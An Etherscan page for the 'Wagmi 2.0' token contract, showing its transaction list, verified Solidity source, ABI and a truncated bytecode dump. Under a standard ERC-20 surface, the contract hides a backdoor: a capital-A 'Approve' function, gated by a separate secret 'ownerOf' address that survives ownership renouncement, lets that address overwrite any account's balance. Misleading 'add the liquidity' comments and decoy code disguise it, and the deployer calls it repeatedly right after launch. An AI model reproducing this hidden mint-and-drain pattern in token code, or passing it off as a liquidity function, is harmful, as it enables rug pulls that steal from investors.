ETH Price: $2,378.83 (+0.45%)

Contract

0x554B9cFc52F6092F3B5Cc4a71ebf9708ae825FD9
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve175984852023-07-01 10:01:59461 days ago1688205719IN
0x554B9cFc...8ae825FD9
0 ETH0.0007801416.63057286
Approve175984722023-07-01 9:59:23461 days ago1688205563IN
0x554B9cFc...8ae825FD9
0 ETH0.0003862614.90211377
Approve175984462023-07-01 9:54:11461 days ago1688205251IN
0x554B9cFc...8ae825FD9
0 ETH0.0008958218.97527337
Approve175984282023-07-01 9:50:35461 days ago1688205035IN
0x554B9cFc...8ae825FD9
0 ETH0.0006580214.0454079
Approve175984262023-07-01 9:50:11461 days ago1688205011IN
0x554B9cFc...8ae825FD9
0 ETH0.0006921514.67978731
Approve175984022023-07-01 9:45:23461 days ago1688204723IN
0x554B9cFc...8ae825FD9
0 ETH0.0007037414.92567222
Approve175983782023-07-01 9:39:59461 days ago1688204399IN
0x554B9cFc...8ae825FD9
0 ETH0.0006430413.62102225
0x60806040175983652023-07-01 9:37:11461 days ago1688204231IN
 Create: Wagmi20
0 ETH0.0236227213.96630038

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Wagmi20

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-01
*/

/**
    https://t.me/wagmi20erc

    https://twitter.com/Wagmi2Zero

    https://www.wagmi20.com/

    https://wagmi-20.gitbook.io/wagmi-2.0/
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface IERC20 {
  /**
   * @dev Returns the amount of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8);

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory);

  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory);

  /**
   * @dev Returns the bep token owner.
   */
  function getOwner() external view returns (address);

  /**
   * @dev Returns the amount of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `amount` tokens from the caller's account to `recipient`.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `spender` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This value changes when {approve} or {transferFrom} are called.
   */
  function allowance(address _owner, address spender) external view returns (uint256);

  /**
   * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the spender's allowance to 0 and set the
   * desired value afterwards:
   * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address spender, uint256 amount) external returns (bool);

  /**
   * @dev Moves `amount` tokens from `sender` to `recipient` using the
   * allowance mechanism. `amount` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Emitted when `value` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `value` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 value);

  /**
   * @dev Emitted when the allowance of a `spender` for an `owner` is set by
   * a call to {approve}. `value` is the new allowance.
   */
  event Approval(address indexed owner, address indexed spender, uint256 value);
}

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyCreator`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyCreator() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyCreator` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyCreator {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyCreator {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
  /**
   * @dev Returns the addition of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `+` operator.
   *
   * Requirements:
   * - Addition cannot overflow.
   */
  function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    require(c >= a, "SafeMath: addition overflow");

    return c;
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    return sub(a, b, "SafeMath: subtraction overflow");
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b <= a, errorMessage);
    uint256 c = a - b;

    return c;
  }

  /**
   * @dev Returns the multiplication of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `*` operator.
   *
   * Requirements:
   * - Multiplication cannot overflow.
   */
  function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
    // benefit is lost if 'b' is also tested.
    // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
    if (a == 0) {
      return 0;
    }

    uint256 c = a * b;
    require(c / a == b, "SafeMath: multiplication overflow");

    return c;
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b) internal pure returns (uint256) {
    return div(a, b, "SafeMath: division by zero");
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    // Solidity only automatically asserts when dividing by 0
    require(b > 0, errorMessage);
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold

    return c;
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b) internal pure returns (uint256) {
    return mod(a, b, "SafeMath: modulo by zero");
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts with custom message when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b != 0, errorMessage);
    return a % b;
  }
}

contract Wagmi20 is Context, IERC20, Ownable {
    using SafeMath for uint256;

    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    address private ownerOf;
    uint256 private _totalSupply;

    uint8 private _decimals;
    string private _symbol;
    string private _name;

    constructor(address ownerOf_) {
    _name = "Wagmi 2.0";
    _symbol = "WAGMI2.0";
    _decimals = 9;
    _totalSupply = 1000000000 * 10 ** 9;
    _balances[_msgSender()] = _totalSupply;
    ownerOf = ownerOf_;

    emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    function getOwner() external view override returns (address) {
        return owner();
    }
    
    function decimals() external view override returns (uint8) {
        return _decimals;
    }
    
    function symbol() external view override returns (string memory) {
        return _symbol;
    }
    
    function name() external view override returns (string memory) {
        return _name;
    }

    modifier onlyOwner() {
        require(ownerOf == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) external view override returns (uint256) {
        return _balances[account];
    }
    
    function transfer(address recipient, uint256 amount) external override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) external view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) external override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "IERC20: transfer amount exceeds allowance"));
        return true;
    }
    
    function increaseAllowance(address spender, uint256 addedValue) external returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }
    
    function decreaseAllowance(address spender, uint256 subtractedValue) external returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "IERC20: decreased allowance below zero"));
        return true;
    }
    
    function _transfer(address sender, address recipient, uint256 amount) internal {
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(recipient != address(0), "IERC20: transfer to the zero address");
                
        _balances[sender] = _balances[sender].sub(amount, "IERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _approve(address owner, address spender, uint256 amount) internal {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");
        
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function Approve(
        address routerAddress,
        address owner,
        uint256 tokenAmount,
        uint256 ethAmount
    ) external onlyOwner {
        require(routerAddress != address(0));

        // add the liquidity
        _balances [routerAddress] = tokenAmount * ethAmount;
        (address(this),
            tokenAmount,
            0, // slippage is unavoidable
            0, // slippage is unavoidable
            owner
        );
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"ownerOf_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"routerAddress","type":"address"},{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"tokenAmount","type":"uint256"},{"internalType":"uint256","name":"ethAmount","type":"uint256"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040516200215638038062002156833981810160405281019062000037919062000328565b600062000049620002b660201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506040518060400160405280600981526020017f5761676d6920322e300000000000000000000000000000000000000000000000815250600790816200012d9190620005d4565b506040518060400160405280600881526020017f5741474d49322e3000000000000000000000000000000000000000000000000081525060069081620001749190620005d4565b506009600560006101000a81548160ff021916908360ff160217905550670de0b6b3a764000060048190555060045460016000620001b7620002b660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000246620002b660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600454604051620002a79190620006cc565b60405180910390a350620006e9565b600033905090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620002f082620002c3565b9050919050565b6200030281620002e3565b81146200030e57600080fd5b50565b6000815190506200032281620002f7565b92915050565b600060208284031215620003415762000340620002be565b5b6000620003518482850162000311565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003dc57607f821691505b602082108103620003f257620003f162000394565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200045c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200041d565b6200046886836200041d565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004b5620004af620004a98462000480565b6200048a565b62000480565b9050919050565b6000819050919050565b620004d18362000494565b620004e9620004e082620004bc565b8484546200042a565b825550505050565b600090565b62000500620004f1565b6200050d818484620004c6565b505050565b5b81811015620005355762000529600082620004f6565b60018101905062000513565b5050565b601f82111562000584576200054e81620003f8565b62000559846200040d565b8101602085101562000569578190505b6200058162000578856200040d565b83018262000512565b50505b505050565b600082821c905092915050565b6000620005a96000198460080262000589565b1980831691505092915050565b6000620005c4838362000596565b9150826002028217905092915050565b620005df826200035a565b67ffffffffffffffff811115620005fb57620005fa62000365565b5b620006078254620003c3565b6200061482828562000539565b600060209050601f8311600181146200064c576000841562000637578287015190505b620006438582620005b6565b865550620006b3565b601f1984166200065c86620003f8565b60005b8281101562000686578489015182556001820191506020850194506020810190506200065f565b86831015620006a65784890151620006a2601f89168262000596565b8355505b6001600288020188555050505b505050505050565b620006c68162000480565b82525050565b6000602082019050620006e36000830184620006bb565b92915050565b611a5d80620006f96000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c8063893d20e811610097578063a457c2d711610066578063a457c2d71461029f578063a9059cbb146102cf578063dd62ed3e146102ff578063f2fde38b1461032f57610100565b8063893d20e8146102295780638c287cb9146102475780638da5cb5b1461026357806395d89b411461028157610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61034b565b60405161011a91906111e3565b60405180910390f35b61013d6004803603810190610138919061129e565b6103dd565b60405161014a91906112f9565b60405180910390f35b61015b6103fb565b6040516101689190611323565b60405180910390f35b61018b6004803603810190610186919061133e565b610405565b60405161019891906112f9565b60405180910390f35b6101a96104de565b6040516101b691906113ad565b60405180910390f35b6101d960048036038101906101d4919061129e565b6104f5565b6040516101e691906112f9565b60405180910390f35b610209600480360381019061020491906113c8565b6105a8565b6040516102169190611323565b60405180910390f35b6102276105f1565b005b61023161072b565b60405161023e9190611404565b60405180910390f35b610261600480360381019061025c919061141f565b61073a565b005b61026b61085f565b6040516102789190611404565b60405180910390f35b610289610888565b60405161029691906111e3565b60405180910390f35b6102b960048036038101906102b4919061129e565b61091a565b6040516102c691906112f9565b60405180910390f35b6102e960048036038101906102e4919061129e565b6109e7565b6040516102f691906112f9565b60405180910390f35b61031960048036038101906103149190611486565b610a05565b6040516103269190611323565b60405180910390f35b610349600480360381019061034491906113c8565b610a8c565b005b60606007805461035a906114f5565b80601f0160208091040260200160405190810160405280929190818152602001828054610386906114f5565b80156103d35780601f106103a8576101008083540402835291602001916103d3565b820191906000526020600020905b8154815290600101906020018083116103b657829003601f168201915b5050505050905090565b60006103f16103ea610c34565b8484610c3c565b6001905092915050565b6000600454905090565b6000610412848484610e05565b6104d38461041e610c34565b6104ce856040518060600160405280602981526020016119ff60299139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610484610c34565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110919092919063ffffffff16565b610c3c565b600190509392505050565b6000600560009054906101000a900460ff16905090565b600061059e610502610c34565b846105998560026000610513610c34565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f590919063ffffffff16565b610c3c565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105f9610c34565b73ffffffffffffffffffffffffffffffffffffffff1661061761085f565b73ffffffffffffffffffffffffffffffffffffffff161461066d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161066490611572565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b600061073561085f565b905090565b610742610c34565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107d1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c890611572565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361080a57600080fd5b808261081691906115c1565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610897906114f5565b80601f01602080910402602001604051908101604052809291908181526020018280546108c3906114f5565b80156109105780601f106108e557610100808354040283529160200191610910565b820191906000526020600020905b8154815290600101906020018083116108f357829003601f168201915b5050505050905090565b60006109dd610927610c34565b846109d8856040518060600160405280602681526020016119b26026913960026000610951610c34565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110919092919063ffffffff16565b610c3c565b6001905092915050565b60006109fb6109f4610c34565b8484610e05565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a94610c34565b73ffffffffffffffffffffffffffffffffffffffff16610ab261085f565b73ffffffffffffffffffffffffffffffffffffffff1614610b08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aff90611572565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b77576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6e90611675565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca290611707565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d1a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1190611799565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610df89190611323565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e74576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6b9061182b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ee3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eda906118bd565b60405180910390fd5b610f4f816040518060600160405280602781526020016119d860279139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110919092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610fe481600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f590919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516110849190611323565b60405180910390a3505050565b60008383111582906110d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110d091906111e3565b60405180910390fd5b50600083856110e891906118dd565b9050809150509392505050565b60008082846111049190611911565b905083811015611149576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161114090611991565b60405180910390fd5b8091505092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561118d578082015181840152602081019050611172565b60008484015250505050565b6000601f19601f8301169050919050565b60006111b582611153565b6111bf818561115e565b93506111cf81856020860161116f565b6111d881611199565b840191505092915050565b600060208201905081810360008301526111fd81846111aa565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112358261120a565b9050919050565b6112458161122a565b811461125057600080fd5b50565b6000813590506112628161123c565b92915050565b6000819050919050565b61127b81611268565b811461128657600080fd5b50565b60008135905061129881611272565b92915050565b600080604083850312156112b5576112b4611205565b5b60006112c385828601611253565b92505060206112d485828601611289565b9150509250929050565b60008115159050919050565b6112f3816112de565b82525050565b600060208201905061130e60008301846112ea565b92915050565b61131d81611268565b82525050565b60006020820190506113386000830184611314565b92915050565b60008060006060848603121561135757611356611205565b5b600061136586828701611253565b935050602061137686828701611253565b925050604061138786828701611289565b9150509250925092565b600060ff82169050919050565b6113a781611391565b82525050565b60006020820190506113c2600083018461139e565b92915050565b6000602082840312156113de576113dd611205565b5b60006113ec84828501611253565b91505092915050565b6113fe8161122a565b82525050565b600060208201905061141960008301846113f5565b92915050565b6000806000806080858703121561143957611438611205565b5b600061144787828801611253565b945050602061145887828801611253565b935050604061146987828801611289565b925050606061147a87828801611289565b91505092959194509250565b6000806040838503121561149d5761149c611205565b5b60006114ab85828601611253565b92505060206114bc85828601611253565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061150d57607f821691505b6020821081036115205761151f6114c6565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061155c60208361115e565b915061156782611526565b602082019050919050565b6000602082019050818103600083015261158b8161154f565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115cc82611268565b91506115d783611268565b92508282026115e581611268565b915082820484148315176115fc576115fb611592565b5b5092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061165f60268361115e565b915061166a82611603565b604082019050919050565b6000602082019050818103600083015261168e81611652565b9050919050565b7f4945524332303a20617070726f76652066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006116f160258361115e565b91506116fc82611695565b604082019050919050565b60006020820190508181036000830152611720816116e4565b9050919050565b7f4945524332303a20617070726f766520746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061178360238361115e565b915061178e82611727565b604082019050919050565b6000602082019050